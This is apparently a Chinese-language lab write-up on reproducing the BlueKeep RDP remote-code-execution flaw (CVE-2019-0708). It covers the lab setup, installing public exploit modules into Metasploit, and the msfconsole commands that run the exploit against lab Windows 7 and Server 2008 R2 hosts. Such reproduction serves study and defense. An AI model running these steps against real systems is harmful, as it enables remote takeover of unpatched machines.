0x00 前言
每次復現都會遇到各種各樣的問題,這次也不例外,經過多次嘗試才復現成功,因此把可能的解決方法也和大家分享一下,有想要一起復現學習/投稿的可以聯系我哈
0x01 影響版本
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
Windows 8和Windows 10及之后版本的用戶不受此漏洞影響
0x02 環境搭建
環境下載鏈接:
win7 sp1:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
win08 R2:ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_vl_build_x64_dvd_617396.iso|3368962048|7C210CAC37A05F459758BCC1F4478F9E|/
本次環境:
win7 sp1 - 192.168.10.10
win08 R2 - 192.168.10.6
kali - 192.168.10.9
win7 sp1 准備:
開啟3389
win08 R2准備:
開啟3389
修改注冊表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
kali 准備:
將以下鏈接中的4個文件分別放至相應的目錄(kali默認目錄)
https://github.com/TinToSer/bluekeep-exploit
rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/
rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/
0x03 漏洞利用
msfconsole
reload_all
search 2019_0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhost 192.168.10.10
set rport 3389
set target 3
run
win08 R2也是同樣的操作命令
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhost 192.168.10.6
set rport 3389
set target 3
run
復現失敗的一些小tip:
1、確認目錄下已經拷貝了相應文件
2、確認3389開啟,msf中reload_all執行
3、kali的內存略微給大一點
4、多run幾次!(重點)
小結:目前exp還很不穩定,建議大家在實戰中暫時不要使用,如果打藍屏可能會造成很嚴重的后果。復現時可能會出現諸多問題,但是只要耐心地多嘗試幾次總會成功的
圖形化檢測工具下載:Timeline Sec公眾號回復0708
參考鏈接:
http://www.nmd5.com/?p=409#comment-46
https://github.com/rapid7/metasploit-framework/pull/12283